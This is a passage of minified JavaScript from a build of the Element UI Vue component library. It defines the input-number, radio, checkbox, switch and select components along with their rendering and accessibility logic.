t=e.target.value,i=t[t.length-1]||"";this.isComposing=!Object(Dt["isKorean"])(i)},handleCompositionEnd:function(e){this.$emit("compositionend",e),this.isComposing&&(this.isComposing=!1,this.handleInput(e))},handleInput:function(e){this.isComposing||e.target.value!==this.nativeInputValue&&(this.$emit("input",e.target.value),this.$nextTick(this.setNativeInputValue))},handleChange:function(e){this.$emit("change",e.target.value)},calcIconOffset:function(e){var t=[].slice.call(this.$el.querySelectorAll(".el-input__"+e)||[]);if(t.length){for(var i=null,n=0;n=0&&e===parseInt(e,10)}}},data:function(){return{currentValue:0,userInput:null}},watch:{value:{immediate:!0,handler:function(e){var t=void 0===e?e:Number(e);if(void 0!==t){if(isNaN(t))return;if(this.stepStrictly){var i=this.getPrecision(this.step),n=Math.pow(10,i);t=Math.round(t/this.step)*n*this.step/n}void 0!==this.precision&&(t=this.toPrecision(t,this.precision))}t>=this.max&&(t=this.max),t<=this.min&&(t=this.min),this.currentValue=t,this.userInput=null,this.$emit("input",t)}}},computed:{minDisabled:function(){return this._decrease(this.value,this.step)this.max},numPrecision:function(){var e=this.value,t=this.step,i=this.getPrecision,n=this.precision,s=i(t);return void 0!==n?(s>n&&console.warn("[Element Warn][InputNumber]precision should not be less than the decimal places of step"),n):Math.max(i(e),s)},controlsAtRight:function(){return this.controls&&"right"===this.controlsPosition},_elFormItemSize:function(){return(this.elFormItem||{}).elFormItemSize},inputNumberSize:function(){return this.size||this._elFormItemSize||(this.$ELEMENT||{}).size},inputNumberDisabled:function(){return this.disabled||!!(this.elForm||{}).disabled},displayValue:function(){if(null!==this.userInput)return this.userInput;var e=this.currentValue;if("number"===typeof e){if(this.stepStrictly){var t=this.getPrecision(this.step),i=Math.pow(10,t);e=Math.round(e/this.step)*i*this.step/i}void 0!==this.precision&&(e=e.toFixed(this.precision))}return e}},methods:{toPrecision:function(e,t){return void 0===t&&(t=this.numPrecision),parseFloat(Math.round(e*Math.pow(10,t))/Math.pow(10,t))},getPrecision:function(e){if(void 0===e)return 0;var t=e.toString(),i=t.indexOf("."),n=0;return-1!==i&&(n=t.length-i-1),n},_increase:function(e,t){if("number"!==typeof e&&void 0!==e)return this.currentValue;var i=Math.pow(10,this.numPrecision);return this.toPrecision((i*e+i*t)/i)},_decrease:function(e,t){if("number"!==typeof e&&void 0!==e)return this.currentValue;var i=Math.pow(10,this.numPrecision);return this.toPrecision((i*e-i*t)/i)},increase:function(){if(!this.inputNumberDisabled&&!this.maxDisabled){var e=this.value||0,t=this._increase(e,this.step);this.setCurrentValue(t)}},decrease:function(){if(!this.inputNumberDisabled&&!this.minDisabled){var e=this.value||0,t=this._decrease(e,this.step);this.setCurrentValue(t)}},handleBlur:function(e){this.$emit("blur",e)},handleFocus:function(e){this.$emit("focus",e)},setCurrentValue:function(e){var t=this.currentValue;"number"===typeof e&&void 0!==this.precision&&(e=this.toPrecision(e,this.precision)),e>=this.max&&(e=this.max),e<=this.min&&(e=this.min),t!==e&&(this.userInput=null,this.$emit("input",e),this.$emit("change",e,t),this.currentValue=e)},handleInput:function(e){this.userInput=e},handleInputChange:function(e){var t=""===e?void 0:Number(e);isNaN(t)&&""!==e||this.setCurrentValue(t),this.userInput=null},select:function(){this.$refs.input.select()}},mounted:function(){var e=this.$refs.input.$refs.input;e.setAttribute("role","spinbutton"),e.setAttribute("aria-valuemax",this.max),e.setAttribute("aria-valuemin",this.min),e.setAttribute("aria-valuenow",this.currentValue),e.setAttribute("aria-disabled",this.inputNumberDisabled)},updated:function(){if(this.$refs&&this.$refs.input){var e=this.$refs.input.$refs.input;e.setAttribute("aria-valuenow",this.currentValue)}}},Ft=jt,Lt=o(Ft,Mt,Nt,!1,null,null,null);Lt.options.__file="packages/input-number/src/input-number.vue";var At=Lt.exports;At.install=function(e){e.component(At.name,At)};var Vt=At,Bt=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("label",{staticClass:"el-radio",class:[e.border&&e.radioSize?"el-radio--"+e.radioSize:"",{"is-disabled":e.isDisabled},{"is-focus":e.focus},{"is-bordered":e.border},{"is-checked":e.model===e.label}],attrs:{role:"radio","aria-checked":e.model===e.label,"aria-disabled":e.isDisabled,tabindex:e.tabIndex},on:{keydown:function(t){if(!("button"in t)&&e._k(t.keyCode,"space",32,t.key,[" ","Spacebar"]))return null;t.stopPropagation(),t.preventDefault(),e.model=e.isDisabled?e.model:e.label}}},[i("span",{staticClass:"el-radio__input",class:{"is-disabled":e.isDisabled,"is-checked":e.model===e.label}},[i("span",{staticClass:"el-radio__inner"}),i("input",{directives:[{name:"model",rawName:"v-model",value:e.model,expression:"model"}],ref:"radio",staticClass:"el-radio__original",attrs:{type:"radio","aria-hidden":"true",name:e.name,disabled:e.isDisabled,tabindex:"-1",autocomplete:"off"},domProps:{value:e.label,checked:e._q(e.model,e.label)},on:{focus:function(t){e.focus=!0},blur:function(t){e.focus=!1},change:[function(t){e.model=e.label},e.handleChange]}})]),i("span",{staticClass:"el-radio__label",on:{keydown:function(e){e.stopPropagation()}}},[e._t("default"),e.$slots.default?e._e():[e._v(e._s(e.label))]],2)])},zt=[];Bt._withStripped=!0;var Rt={name:"ElRadio",mixins:[O.a],inject:{elForm:{default:""},elFormItem:{default:""}},componentName:"ElRadio",props:{value:{},label:{},disabled:Boolean,name:String,border:Boolean,size:String},data:function(){return{focus:!1}},computed:{isGroup:function(){var e=this.$parent;while(e){if("ElRadioGroup"===e.$options.componentName)return this._radioGroup=e,!0;e=e.$parent}return!1},model:{get:function(){return this.isGroup?this._radioGroup.value:this.value},set:function(e){this.isGroup?this.dispatch("ElRadioGroup","input",[e]):this.$emit("input",e),this.$refs.radio&&(this.$refs.radio.checked=this.model===this.label)}},_elFormItemSize:function(){return(this.elFormItem||{}).elFormItemSize},radioSize:function(){var e=this.size||this._elFormItemSize||(this.$ELEMENT||{}).size;return this.isGroup&&this._radioGroup.radioGroupSize||e},isDisabled:function(){return this.isGroup?this._radioGroup.disabled||this.disabled||(this.elForm||{}).disabled:this.disabled||(this.elForm||{}).disabled},tabIndex:function(){return this.isDisabled||this.isGroup&&this.model!==this.label?-1:0}},methods:{handleChange:function(){var e=this;this.$nextTick((function(){e.$emit("change",e.model),e.isGroup&&e.dispatch("ElRadioGroup","handleChange",e.model)}))}}},Ht=Rt,Wt=o(Ht,Bt,zt,!1,null,null,null);Wt.options.__file="packages/radio/src/radio.vue";var qt=Wt.exports;qt.install=function(e){e.component(qt.name,qt)};var Yt=qt,Kt=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i(e._elTag,{tag:"component",staticClass:"el-radio-group",attrs:{role:"radiogroup"},on:{keydown:e.handleKeydown}},[e._t("default")],2)},Ut=[];Kt._withStripped=!0;var Gt=Object.freeze({LEFT:37,UP:38,RIGHT:39,DOWN:40}),Xt={name:"ElRadioGroup",componentName:"ElRadioGroup",inject:{elFormItem:{default:""}},mixins:[O.a],props:{value:{},size:String,fill:String,textColor:String,disabled:Boolean},computed:{_elFormItemSize:function(){return(this.elFormItem||{}).elFormItemSize},_elTag:function(){var e=(this.$vnode.data||{}).tag;return e&&"component"!==e||(e="div"),e},radioGroupSize:function(){return this.size||this._elFormItemSize||(this.$ELEMENT||{}).size}},created:function(){var e=this;this.$on("handleChange",(function(t){e.$emit("change",t)}))},mounted:function(){var e=this.$el.querySelectorAll("[type=radio]"),t=this.$el.querySelectorAll("[role=radio]")[0];![].some.call(e,(function(e){return e.checked}))&&t&&(t.tabIndex=0)},methods:{handleKeydown:function(e){var t=e.target,i="INPUT"===t.nodeName?"[type=radio]":"[role=radio]",n=this.$el.querySelectorAll(i),s=n.length,r=[].indexOf.call(n,t),a=this.$el.querySelectorAll("[role=radio]");switch(e.keyCode){case Gt.LEFT:case Gt.UP:e.stopPropagation(),e.preventDefault(),0===r?(a[s-1].click(),a[s-1].focus()):(a[r-1].click(),a[r-1].focus());break;case Gt.RIGHT:case Gt.DOWN:r===s-1?(e.stopPropagation(),e.preventDefault(),a[0].click(),a[0].focus()):(a[r+1].click(),a[r+1].focus());break;default:break}}},watch:{value:function(e){this.dispatch("ElFormItem","el.form.change",[this.value])}}},Zt=Xt,Qt=o(Zt,Kt,Ut,!1,null,null,null);Qt.options.__file="packages/radio/src/radio-group.vue";var Jt=Qt.exports;Jt.install=function(e){e.component(Jt.name,Jt)};var ei=Jt,ti=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("label",{staticClass:"el-radio-button",class:[e.size?"el-radio-button--"+e.size:"",{"is-active":e.value===e.label},{"is-disabled":e.isDisabled},{"is-focus":e.focus}],attrs:{role:"radio","aria-checked":e.value===e.label,"aria-disabled":e.isDisabled,tabindex:e.tabIndex},on:{keydown:function(t){if(!("button"in t)&&e._k(t.keyCode,"space",32,t.key,[" ","Spacebar"]))return null;t.stopPropagation(),t.preventDefault(),e.value=e.isDisabled?e.value:e.label}}},[i("input",{directives:[{name:"model",rawName:"v-model",value:e.value,expression:"value"}],staticClass:"el-radio-button__orig-radio",attrs:{type:"radio",name:e.name,disabled:e.isDisabled,tabindex:"-1",autocomplete:"off"},domProps:{value:e.label,checked:e._q(e.value,e.label)},on:{change:[function(t){e.value=e.label},e.handleChange],focus:function(t){e.focus=!0},blur:function(t){e.focus=!1}}}),i("span",{staticClass:"el-radio-button__inner",style:e.value===e.label?e.activeStyle:null,on:{keydown:function(e){e.stopPropagation()}}},[e._t("default"),e.$slots.default?e._e():[e._v(e._s(e.label))]],2)])},ii=[];ti._withStripped=!0;var ni={name:"ElRadioButton",mixins:[O.a],inject:{elForm:{default:""},elFormItem:{default:""}},props:{label:{},disabled:Boolean,name:String},data:function(){return{focus:!1}},computed:{value:{get:function(){return this._radioGroup.value},set:function(e){this._radioGroup.$emit("input",e)}},_radioGroup:function(){var e=this.$parent;while(e){if("ElRadioGroup"===e.$options.componentName)return e;e=e.$parent}return!1},activeStyle:function(){return{backgroundColor:this._radioGroup.fill||"",borderColor:this._radioGroup.fill||"",boxShadow:this._radioGroup.fill?"-1px 0 0 0 "+this._radioGroup.fill:"",color:this._radioGroup.textColor||""}},_elFormItemSize:function(){return(this.elFormItem||{}).elFormItemSize},size:function(){return this._radioGroup.radioGroupSize||this._elFormItemSize||(this.$ELEMENT||{}).size},isDisabled:function(){return this.disabled||this._radioGroup.disabled||(this.elForm||{}).disabled},tabIndex:function(){return this.isDisabled||this._radioGroup&&this.value!==this.label?-1:0}},methods:{handleChange:function(){var e=this;this.$nextTick((function(){e.dispatch("ElRadioGroup","handleChange",e.value)}))}}},si=ni,ri=o(si,ti,ii,!1,null,null,null);ri.options.__file="packages/radio/src/radio-button.vue";var ai=ri.exports;ai.install=function(e){e.component(ai.name,ai)};var oi=ai,li=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("label",{staticClass:"el-checkbox",class:[e.border&&e.checkboxSize?"el-checkbox--"+e.checkboxSize:"",{"is-disabled":e.isDisabled},{"is-bordered":e.border},{"is-checked":e.isChecked}],attrs:{id:e.id}},[i("span",{staticClass:"el-checkbox__input",class:{"is-disabled":e.isDisabled,"is-checked":e.isChecked,"is-indeterminate":e.indeterminate,"is-focus":e.focus},attrs:{tabindex:!!e.indeterminate&&0,role:!!e.indeterminate&&"checkbox","aria-checked":!!e.indeterminate&&"mixed"}},[i("span",{staticClass:"el-checkbox__inner"}),e.trueLabel||e.falseLabel?i("input",{directives:[{name:"model",rawName:"v-model",value:e.model,expression:"model"}],staticClass:"el-checkbox__original",attrs:{type:"checkbox","aria-hidden":e.indeterminate?"true":"false",name:e.name,disabled:e.isDisabled,"true-value":e.trueLabel,"false-value":e.falseLabel},domProps:{checked:Array.isArray(e.model)?e._i(e.model,null)>-1:e._q(e.model,e.trueLabel)},on:{change:[function(t){var i=e.model,n=t.target,s=n.checked?e.trueLabel:e.falseLabel;if(Array.isArray(i)){var r=null,a=e._i(i,r);n.checked?a<0&&(e.model=i.concat([r])):a>-1&&(e.model=i.slice(0,a).concat(i.slice(a+1)))}else e.model=s},e.handleChange],focus:function(t){e.focus=!0},blur:function(t){e.focus=!1}}}):i("input",{directives:[{name:"model",rawName:"v-model",value:e.model,expression:"model"}],staticClass:"el-checkbox__original",attrs:{type:"checkbox","aria-hidden":e.indeterminate?"true":"false",disabled:e.isDisabled,name:e.name},domProps:{value:e.label,checked:Array.isArray(e.model)?e._i(e.model,e.label)>-1:e.model},on:{change:[function(t){var i=e.model,n=t.target,s=!!n.checked;if(Array.isArray(i)){var r=e.label,a=e._i(i,r);n.checked?a<0&&(e.model=i.concat([r])):a>-1&&(e.model=i.slice(0,a).concat(i.slice(a+1)))}else e.model=s},e.handleChange],focus:function(t){e.focus=!0},blur:function(t){e.focus=!1}}})]),e.$slots.default||e.label?i("span",{staticClass:"el-checkbox__label"},[e._t("default"),e.$slots.default?e._e():[e._v(e._s(e.label))]],2):e._e()])},ci=[];li._withStripped=!0;var ui={name:"ElCheckbox",mixins:[O.a],inject:{elForm:{default:""},elFormItem:{default:""}},componentName:"ElCheckbox",data:function(){return{selfModel:!1,focus:!1,isLimitExceeded:!1}},computed:{model:{get:function(){return this.isGroup?this.store:void 0!==this.value?this.value:this.selfModel},set:function(e){this.isGroup?(this.isLimitExceeded=!1,void 0!==this._checkboxGroup.min&&e.lengththis._checkboxGroup.max&&(this.isLimitExceeded=!0),!1===this.isLimitExceeded&&this.dispatch("ElCheckboxGroup","input",[e])):(this.$emit("input",e),this.selfModel=e)}},isChecked:function(){return"[object Boolean]"==={}.toString.call(this.model)?this.model:Array.isArray(this.model)?this.model.indexOf(this.label)>-1:null!==this.model&&void 0!==this.model?this.model===this.trueLabel:void 0},isGroup:function(){var e=this.$parent;while(e){if("ElCheckboxGroup"===e.$options.componentName)return this._checkboxGroup=e,!0;e=e.$parent}return!1},store:function(){return this._checkboxGroup?this._checkboxGroup.value:this.value},isLimitDisabled:function(){var e=this._checkboxGroup,t=e.max,i=e.min;return!(!t&&!i)&&this.model.length>=t&&!this.isChecked||this.model.length<=i&&this.isChecked},isDisabled:function(){return this.isGroup?this._checkboxGroup.disabled||this.disabled||(this.elForm||{}).disabled||this.isLimitDisabled:this.disabled||(this.elForm||{}).disabled},_elFormItemSize:function(){return(this.elFormItem||{}).elFormItemSize},checkboxSize:function(){var e=this.size||this._elFormItemSize||(this.$ELEMENT||{}).size;return this.isGroup&&this._checkboxGroup.checkboxGroupSize||e}},props:{value:{},label:{},indeterminate:Boolean,disabled:Boolean,checked:Boolean,name:String,trueLabel:[String,Number],falseLabel:[String,Number],id:String,controls:String,border:Boolean,size:String},methods:{addToStore:function(){Array.isArray(this.model)&&-1===this.model.indexOf(this.label)?this.model.push(this.label):this.model=this.trueLabel||!0},handleChange:function(e){var t=this;if(!this.isLimitExceeded){var i=void 0;i=e.target.checked?void 0===this.trueLabel||this.trueLabel:void 0!==this.falseLabel&&this.falseLabel,this.$emit("change",i,e),this.$nextTick((function(){t.isGroup&&t.dispatch("ElCheckboxGroup","change",[t._checkboxGroup.value])}))}}},created:function(){this.checked&&this.addToStore()},mounted:function(){this.indeterminate&&this.$el.setAttribute("aria-controls",this.controls)},watch:{value:function(e){this.dispatch("ElFormItem","el.form.change",e)}}},hi=ui,di=o(hi,li,ci,!1,null,null,null);di.options.__file="packages/checkbox/src/checkbox.vue";var pi=di.exports;pi.install=function(e){e.component(pi.name,pi)};var fi=pi,mi=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("label",{staticClass:"el-checkbox-button",class:[e.size?"el-checkbox-button--"+e.size:"",{"is-disabled":e.isDisabled},{"is-checked":e.isChecked},{"is-focus":e.focus}],attrs:{role:"checkbox","aria-checked":e.isChecked,"aria-disabled":e.isDisabled}},[e.trueLabel||e.falseLabel?i("input",{directives:[{name:"model",rawName:"v-model",value:e.model,expression:"model"}],staticClass:"el-checkbox-button__original",attrs:{type:"checkbox",name:e.name,disabled:e.isDisabled,"true-value":e.trueLabel,"false-value":e.falseLabel},domProps:{checked:Array.isArray(e.model)?e._i(e.model,null)>-1:e._q(e.model,e.trueLabel)},on:{change:[function(t){var i=e.model,n=t.target,s=n.checked?e.trueLabel:e.falseLabel;if(Array.isArray(i)){var r=null,a=e._i(i,r);n.checked?a<0&&(e.model=i.concat([r])):a>-1&&(e.model=i.slice(0,a).concat(i.slice(a+1)))}else e.model=s},e.handleChange],focus:function(t){e.focus=!0},blur:function(t){e.focus=!1}}}):i("input",{directives:[{name:"model",rawName:"v-model",value:e.model,expression:"model"}],staticClass:"el-checkbox-button__original",attrs:{type:"checkbox",name:e.name,disabled:e.isDisabled},domProps:{value:e.label,checked:Array.isArray(e.model)?e._i(e.model,e.label)>-1:e.model},on:{change:[function(t){var i=e.model,n=t.target,s=!!n.checked;if(Array.isArray(i)){var r=e.label,a=e._i(i,r);n.checked?a<0&&(e.model=i.concat([r])):a>-1&&(e.model=i.slice(0,a).concat(i.slice(a+1)))}else e.model=s},e.handleChange],focus:function(t){e.focus=!0},blur:function(t){e.focus=!1}}}),e.$slots.default||e.label?i("span",{staticClass:"el-checkbox-button__inner",style:e.isChecked?e.activeStyle:null},[e._t("default",[e._v(e._s(e.label))])],2):e._e()])},vi=[];mi._withStripped=!0;var gi={name:"ElCheckboxButton",mixins:[O.a],inject:{elForm:{default:""},elFormItem:{default:""}},data:function(){return{selfModel:!1,focus:!1,isLimitExceeded:!1}},props:{value:{},label:{},disabled:Boolean,checked:Boolean,name:String,trueLabel:[String,Number],falseLabel:[String,Number]},computed:{model:{get:function(){return this._checkboxGroup?this.store:void 0!==this.value?this.value:this.selfModel},set:function(e){this._checkboxGroup?(this.isLimitExceeded=!1,void 0!==this._checkboxGroup.min&&e.lengththis._checkboxGroup.max&&(this.isLimitExceeded=!0),!1===this.isLimitExceeded&&this.dispatch("ElCheckboxGroup","input",[e])):void 0!==this.value?this.$emit("input",e):this.selfModel=e}},isChecked:function(){return"[object Boolean]"==={}.toString.call(this.model)?this.model:Array.isArray(this.model)?this.model.indexOf(this.label)>-1:null!==this.model&&void 0!==this.model?this.model===this.trueLabel:void 0},_checkboxGroup:function(){var e=this.$parent;while(e){if("ElCheckboxGroup"===e.$options.componentName)return e;e=e.$parent}return!1},store:function(){return this._checkboxGroup?this._checkboxGroup.value:this.value},activeStyle:function(){return{backgroundColor:this._checkboxGroup.fill||"",borderColor:this._checkboxGroup.fill||"",color:this._checkboxGroup.textColor||"","box-shadow":"-1px 0 0 0 "+this._checkboxGroup.fill}},_elFormItemSize:function(){return(this.elFormItem||{}).elFormItemSize},size:function(){return this._checkboxGroup.checkboxGroupSize||this._elFormItemSize||(this.$ELEMENT||{}).size},isLimitDisabled:function(){var e=this._checkboxGroup,t=e.max,i=e.min;return!(!t&&!i)&&this.model.length>=t&&!this.isChecked||this.model.length<=i&&this.isChecked},isDisabled:function(){return this._checkboxGroup?this._checkboxGroup.disabled||this.disabled||(this.elForm||{}).disabled||this.isLimitDisabled:this.disabled||(this.elForm||{}).disabled}},methods:{addToStore:function(){Array.isArray(this.model)&&-1===this.model.indexOf(this.label)?this.model.push(this.label):this.model=this.trueLabel||!0},handleChange:function(e){var t=this;if(!this.isLimitExceeded){var i=void 0;i=e.target.checked?void 0===this.trueLabel||this.trueLabel:void 0!==this.falseLabel&&this.falseLabel,this.$emit("change",i,e),this.$nextTick((function(){t._checkboxGroup&&t.dispatch("ElCheckboxGroup","change",[t._checkboxGroup.value])}))}}},created:function(){this.checked&&this.addToStore()}},bi=gi,yi=o(bi,mi,vi,!1,null,null,null);yi.options.__file="packages/checkbox/src/checkbox-button.vue";var _i=yi.exports;_i.install=function(e){e.component(_i.name,_i)};var xi=_i,Ci=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-checkbox-group",attrs:{role:"group","aria-label":"checkbox-group"}},[e._t("default")],2)},wi=[];Ci._withStripped=!0;var ki={name:"ElCheckboxGroup",componentName:"ElCheckboxGroup",mixins:[O.a],inject:{elFormItem:{default:""}},props:{value:{},disabled:Boolean,min:Number,max:Number,size:String,fill:String,textColor:String},computed:{_elFormItemSize:function(){return(this.elFormItem||{}).elFormItemSize},checkboxGroupSize:function(){return this.size||this._elFormItemSize||(this.$ELEMENT||{}).size}},watch:{value:function(e){this.dispatch("ElFormItem","el.form.change",[e])}}},Si=ki,Di=o(Si,Ci,wi,!1,null,null,null);Di.options.__file="packages/checkbox/src/checkbox-group.vue";var $i=Di.exports;$i.install=function(e){e.component($i.name,$i)};var Oi=$i,Ei=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-switch",class:{"is-disabled":e.switchDisabled,"is-checked":e.checked},attrs:{role:"switch","aria-checked":e.checked,"aria-disabled":e.switchDisabled},on:{click:function(t){return t.preventDefault(),e.switchValue(t)}}},[i("input",{ref:"input",staticClass:"el-switch__input",attrs:{type:"checkbox",id:e.id,name:e.name,"true-value":e.activeValue,"false-value":e.inactiveValue,disabled:e.switchDisabled},on:{change:e.handleChange,keydown:function(t){return!("button"in t)&&e._k(t.keyCode,"enter",13,t.key,"Enter")?null:e.switchValue(t)}}}),e.inactiveIconClass||e.inactiveText?i("span",{class:["el-switch__label","el-switch__label--left",e.checked?"":"is-active"]},[e.inactiveIconClass?i("i",{class:[e.inactiveIconClass]}):e._e(),!e.inactiveIconClass&&e.inactiveText?i("span",{attrs:{"aria-hidden":e.checked}},[e._v(e._s(e.inactiveText))]):e._e()]):e._e(),i("span",{ref:"core",staticClass:"el-switch__core",style:{width:e.coreWidth+"px"}}),e.activeIconClass||e.activeText?i("span",{class:["el-switch__label","el-switch__label--right",e.checked?"is-active":""]},[e.activeIconClass?i("i",{class:[e.activeIconClass]}):e._e(),!e.activeIconClass&&e.activeText?i("span",{attrs:{"aria-hidden":!e.checked}},[e._v(e._s(e.activeText))]):e._e()]):e._e()])},Ti=[];Ei._withStripped=!0;var Pi={name:"ElSwitch",mixins:[Z()("input"),D.a,O.a],inject:{elForm:{default:""}},props:{value:{type:[Boolean,String,Number],default:!1},disabled:{type:Boolean,default:!1},width:{type:Number,default:40},activeIconClass:{type:String,default:""},inactiveIconClass:{type:String,default:""},activeText:String,inactiveText:String,activeColor:{type:String,default:""},inactiveColor:{type:String,default:""},activeValue:{type:[Boolean,String,Number],default:!0},inactiveValue:{type:[Boolean,String,Number],default:!1},name:{type:String,default:""},validateEvent:{type:Boolean,default:!0},id:String},data:function(){return{coreWidth:this.width}},created:function(){~[this.activeValue,this.inactiveValue].indexOf(this.value)||this.$emit("input",this.inactiveValue)},computed:{checked:function(){return this.value===this.activeValue},switchDisabled:function(){return this.disabled||(this.elForm||{}).disabled}},watch:{checked:function(){this.$refs.input.checked=this.checked,(this.activeColor||this.inactiveColor)&&this.setBackgroundColor(),this.validateEvent&&this.dispatch("ElFormItem","el.form.change",[this.value])}},methods:{handleChange:function(e){var t=this,i=this.checked?this.inactiveValue:this.activeValue;this.$emit("input",i),this.$emit("change",i),this.$nextTick((function(){t.$refs.input&&(t.$refs.input.checked=t.checked)}))},setBackgroundColor:function(){var e=this.checked?this.activeColor:this.inactiveColor;this.$refs.core.style.borderColor=e,this.$refs.core.style.backgroundColor=e},switchValue:function(){!this.switchDisabled&&this.handleChange()},getMigratingConfig:function(){return{props:{"on-color":"on-color is renamed to active-color.","off-color":"off-color is renamed to inactive-color.","on-text":"on-text is renamed to active-text.","off-text":"off-text is renamed to inactive-text.","on-value":"on-value is renamed to active-value.","off-value":"off-value is renamed to inactive-value.","on-icon-class":"on-icon-class is renamed to active-icon-class.","off-icon-class":"off-icon-class is renamed to inactive-icon-class."}}}},mounted:function(){this.coreWidth=this.width||40,(this.activeColor||this.inactiveColor)&&this.setBackgroundColor(),this.$refs.input.checked=this.checked}},Mi=Pi,Ni=o(Mi,Ei,Ti,!1,null,null,null);Ni.options.__file="packages/switch/src/component.vue";var Ii=Ni.exports;Ii.install=function(e){e.component(Ii.name,Ii)};var ji=Ii,Fi=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{directives:[{name:"clickoutside",rawName:"v-clickoutside",value:e.handleClose,expression:"handleClose"}],staticClass:"el-select",class:[e.selectSize?"el-select--"+e.selectSize:""],on:{click:function(t){return t.stopPropagation(),e.toggleMenu(t)}}},[e.multiple?i("div",{ref:"tags",staticClass:"el-select__tags",style:{"max-width":e.inputWidth-32+"px",width:"100%"}},[e.collapseTags&&e.selected.length?i("span",[i("el-tag",{attrs:{closable:!e.selectDisabled,size:e.collapseTagSize,hit:e.selected[0].hitState,type:"info","disable-transitions":""},on:{close:function(t){e.deleteTag(t,e.selected[0])}}},[i("span",{staticClass:"el-select__tags-text"},[e._v(e._s(e.selected[0].currentLabel))])]),e.selected.length>1?i("el-tag",{attrs:{closable:!1,size:e.collapseTagSize,type:"info","disable-transitions":""}},[i("span",{staticClass:"el-select__tags-text"},[e._v("+ "+e._s(e.selected.length-1))])]):e._e()],1):e._e(),e.collapseTags?e._e():i("transition-group",{on:{"after-leave":e.resetInputHeight}},e._l(e.selected,(function(t){return i("el-tag",{key:e.getValueKey(t),attrs:{closable:!e.selectDisabled,size:e.collapseTagSize,hit:t.hitState,type:"info","disable-transitions":""},on:{close:function(i){e.deleteTag(i,t)}}},[i("span",{staticClass:"el-select__tags-text"},[e._v(e._s(t.currentLabel))])])})),1),e.filterable?i("input",{directives:[{name:"model",rawName:"v-model",value:e.query,expression:"query"}],ref:"input",staticClass:"el-select__input",class:[e.selectSize?"is-"+e.selectSize:""],style:{"flex-grow":"1",width:e.inputLength/(e.inputWidth-32)+"%","max-width":e.inputWidth-42+"px"},attrs:{type:"text",disabled:e.selectDisabled,autocomplete:e.autoComplete||e.autocomplete},domProps:{value:e.query},on:{focus:e.handleFocus,blur:function(t){e.softFocus=!1},keyup:e.managePlaceholder,keydown:[e.resetInputState,function(t){if(!("button"in t)&&e._k(t.keyCode,"down",40,t.key,["Down","ArrowDown"]))return null;t.preventDefault(),e.handleNavigate("next")},function(t){if(!("button"in t)&&e._k(t.keyCode,"up",38,t.key,["Up","ArrowUp"]))return null;t.preventDefault(),e.handleNavigate("prev")},function(t){return!("button"in t)&&e._k(t.keyCode,"enter",13,t.key,"Enter")?null:(t.preventDefault(),e.selectOption(t))},function(t){if(!("button"in t)&&e._k(t.keyCode,"esc",27,t.key,["Esc","Escape"]))return null;t.stopPropagation(),t.preventDefault(),e.visible=!1},function(t){return!("button"in t)&&e._k(t.keyCode,"delete",[8,46],t.key,["Backspace","Delete","Del"])?null:e.deletePrevTag(t)},function(t){if(!("button"in t)&&e._k(t.keyCode,"tab",9,t.key,"Tab"))return null;e.visible=!1}],compositionstart:e.handleComposition,compositionupdate:e.handleComposition,compositionend:e.handleComposition,input:[function(t){t.target.composing||(e.query=t.target.value)},e.debouncedQueryChange]}}):e._e()],1):e._e(),i("el-input",{ref:"reference",class:{"is-focus":e.visible},attrs:{type:"text",placeholder:e.currentPlaceholder,name:e.name,id:e.id,autocomplete:e.autoComplete||e.autocomplete,size:e.selectSize,disabled:e.selectDisabled,readonly:e.readonly,"validate-event":!1,tabindex:e.multiple&&e.filterable?"-1":null},on:{focus:e.handleFocus,blur:e.handleBlur,input:e.debouncedOnInputChange,compositionstart:e.handleComposition,compositionupdate:e.handleComposition,compositionend:e.handleComposition},nativeOn:{keydown:[function(t){if(!("button"in t)&&e._k(t.keyCode,"down",40,t.key,["Down","ArrowDown"]))return null;t.stopPropagation(),t.preventDefault(),e.handleNavigate("next")},function(t){if(!("button"in t)&&e._k(t.keyCode,"up",38,t.key,["Up","ArrowUp"]))return null;t.stopPropagation(),t.preventDefault(),e.handleNavigate("prev")},function(t){return!("button"in t)&&e._k(t.keyCode,"enter",13,t.key,"Enter")?null:(t.preventDefault(),e.selectOption(t))},function(t){if(!("button"in t)&&e._k(t.keyCode,"esc",27,t.key,["Esc","Escape"]))return null;t.stopPropagation(),t.preventDefault(),e.visible=!1},function(t){if(!("button"in t)&&e._k(t.keyCode,"tab",9,t.key,"Tab"))return null;e.visible=!1}],mouseenter:function(t){e.inputHovering=!0},mouseleave:function(t){e.inputHovering=!1}},model:{value:e.selectedLabel,callback:function(t){e.selectedLabel=t},expression:"selectedLabel"}},[e.$slots.prefix?i("template",{slot:"prefix"},[e._t("prefix")],2):e._e(),i("template",{slot:"suffix"},[i("i",{directives:[{name:"show",rawName:"v-show",value:!e.showClose,expression:"!showClose"}],class:["el-select__caret","el-input__icon","el-icon-"+e.iconClass]}),e.showClose?i("i",{staticClass:"el-select__caret el-input__icon el-icon-circle-close",on:{click:e.handleClearClick}}):e._e()])],2),i("transition",{attrs:{name:"el-zoom-in-top"},on:{"before-enter":e.handleMenuEnter,"after-leave":e.doDestroy}},[i("el-select-menu",{directives:[{name:"show",rawName:"v-show",value:e.visible&&!1!==e.emptyText,expression:"visible && emptyText !== false"}],ref:"popper",attrs:{"append-to-body":e.popperAppendToBody}},[i("el-scrollbar",{directives:[{name:"show",rawName:"v-show",value:e.options.length>0&&!e.loading,expression:"options.length > 0 && !loading"}],ref:"scrollbar",class:{"is-empty":!e.allowCreate&&e.query&&0===e.filteredOptionsCount},attrs:{tag:"ul","wrap-class":"el-select-dropdown__wrap","view-class":"el-select-dropdown__list"}},[e.showNewOption?i("el-option",{attrs:{value:e.query,created:""}}):e._e(),e._t("default")],2),e.emptyText&&(!e.allowCreate||e.loading||e.allowCreate&&0===e.options.length)?[e.$slots.empty?e._t("empty"):i("p",{staticClass:"el-select-dropdown__empty"},[e._v("\n "+e._s(e.emptyText)+"\n ")])]:e._e()],2)],1)],1)},Li=[];Fi._withStripped=!0;var Ai=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-select-dropdown 